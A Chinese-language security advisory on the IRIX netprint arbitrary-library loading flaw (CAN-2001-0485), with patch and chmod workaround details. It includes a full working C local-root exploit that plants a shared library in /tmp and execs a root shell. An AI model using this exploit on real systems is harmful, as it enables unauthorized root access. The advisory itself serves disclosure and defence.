首页 -> 安全研究
安全研究
安全漏洞
IRIX 'netprint' 打开任意动态链接库漏洞
发布日期:2001-05-02
更新日期:2001-07-26
受影响系统:
不受影响系统:
SGI IRIX 6.5.12m
SGI IRIX 6.5.12f
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0.1
SGI IRIX 6.0
SGI IRIX 5.3
描述:
SGI IRIX 6.5.13
BUGTRAQ ID: 2656
CVE CAN ID: CAN-2001-0485
SGI Irix系统携带的netprint工具用于向远程主机提交打印任务,缺省安装后它是
setuid-to-root的。netprint从命令行上接收-n选项指定的网络类型,根据-n后面的
参数串打开相应的动态链接库。但是netprint没有对这个参数串做检查,攻击者可以
提供自己的动态链接库。由于netprint本身是setuid-to-root的,攻击者提供的代码
将以root身份运行。尽管只有lp用户可以执行netprint,但在许多早期版本的Irix中,
lp是无口令的默认帐号。如果lp帐号未被禁用,远程攻击者可以以lp身份登录进入系
统,利用netprint的漏洞获取root权限。
<* 来源:Vade79 (v9@realhalo.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org]. this will
give you uid=0 on IRIX systems. this exploit simply takes advantage of
netprint's -n option to execute arbitrary code and gain elevated
privileges.
example:
----------------------------------------------------------------------------
--
$ cc xnetprint.c -o xnetprint
$ id
uid=9(lp) gid=9(lp)
$ ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# id
uid=0(root) gid=0(sys)
#
----------------------------------------------------------------------------
--
note: built and tested on IRIX 6.2. this often requires the uid of lp
to work correctly. though, should prove effective up to 6.4 or
higher.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#define PATH "/usr/lib/print/netprint" /* path to exploitable program. */
#define CCPATH "/usr/bin/cc" /* path to compiler. */
#define SRCFILE "/tmp/xnetrpintso.c" /* path to temporary symbols source. */
#define SOFILE "/tmp/xnetprintso.so" /* path to compile as. */
#define FAKESOFILE "../../../../tmp/xnetprintso" /* arg to feed netprint. */
void cleanup(unsigned short i){
if(!access(SRCFILE,F_OK))
unlink(SRCFILE);
if(!access(SOFILE,F_OK))
unlink(SOFILE);
if(i)
exit(i);
}
int main(int argc,char **argv){
char *syscmd;
struct stat mod;
FILE *symbol;
printf("[(IRIX)netprint[] local root exploit, by:
v9[v9@realhalo.org]. ]\n");
if(argc<2){
printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
cleanup(1);
}
if(stat(PATH,&mod)){
printf("[!] failed, could not get stats on %s.\n",PATH);
cleanup(1);
}
if(mod.st_uid||!(S_ISUID&mod.st_mode)){
printf("[!] failed, %s is not setuid root.\n",PATH);
cleanup(1);
}
if(access(argv[1],X_OK)){
printf("[!] failed, %s doesn't seem to exist or is not executable.\n",
argv[1]);
cleanup(1);
}
if(access(CCPATH,X_OK)){
printf("[!] failed, %s compiler doesn't seem to exist or is not
executable."
"\n",CCPATH);
cleanup(1);
}
printf("[*] making symbols source file for netprint to execute.\n");
cleanup(0);
if(!(symbol=fopen(SRCFILE,"w"))){
printf("[!] failed, could not open temporary file to write to.\n");
cleanup(1);
}
fprintf(symbol,"void OpenConn(){\n");
fprintf(symbol," seteuid(0);\n");
fprintf(symbol," setuid(0);\n");
fprintf(symbol," setegid(0);\n");
fprintf(symbol," setgid(0);\n");
fprintf(symbol," printf(\"\[*] success, uid: %%u, euid: %%u, gid: %%u,
egid: "
"%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
fprintf(symbol," execl(\"%s\",\"%s\",0);\n",argv[1],argv[1]);
fprintf(symbol,"}\n");
fprintf(symbol,"void CloseConn(){}\n");
fprintf(symbol,"void ListPrinters(){}\n");
fprintf(symbol,"void SendJob(){}\n");
fprintf(symbol,"void CancelJob(){}\n");
fprintf(symbol,"void WaitForJob(){}\n");
fprintf(symbol,"void GetQueue(){}\n");
fprintf(symbol,"void StartTagging(){}\n");
fprintf(symbol,"void StopTagging(){}\n");
fprintf(symbol,"void Install(){}\n");
fprintf(symbol,"void IsDest(){}\n");
fclose(symbol);
printf("[*] done, now compiling symbols source file.\n");
if(!(syscmd=(char
*)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1)
)){
printf("[!] failed, could not allocate memory.\n");
cleanup(1);
}
sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
system(syscmd);
printf("[*] done, now checking to see if the symbols source compiled.\n");
if(access(SOFILE,R_OK)){
printf("[!] failed, symbols source was not compiled properly.\n");
cleanup(1);
}
printf("[*] done, now executing netprint.\n");
if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",0)){
printf("[!] failed, %s did not execute properly.\n",PATH);
cleanup(1);
}
}
建议:
临时解决办法:
去掉netprint的suid属性:
% /bin/su -
Password:
#
# /bin/chmod 500 /usr/lib/print/netprint
厂商补丁:
IRIX已经为此发布了一个安全公告(20010701-01-P)以及相应补丁:
OS Version Vulnerable? Patch #
---------- ----------- -------
IRIX 3.x unknown
IRIX 4.x unknown
IRIX 5.x unknown
IRIX 6.0.x-6.4 unknown
IRIX 6.5-6.5.11 yes
IRIX 6.5.12m yes 4310
IRIX 6.5.12f yes 4311
IRIX 6.5.13 no
SGI 安全补丁可以在下列地址下载:
http://www.sgi.com/support/security/
ftp://patches.sgi.com/support/free/security/patches/
浏览次数:4086
严重程度:0(网友投票)
绿盟科技给您安全的保障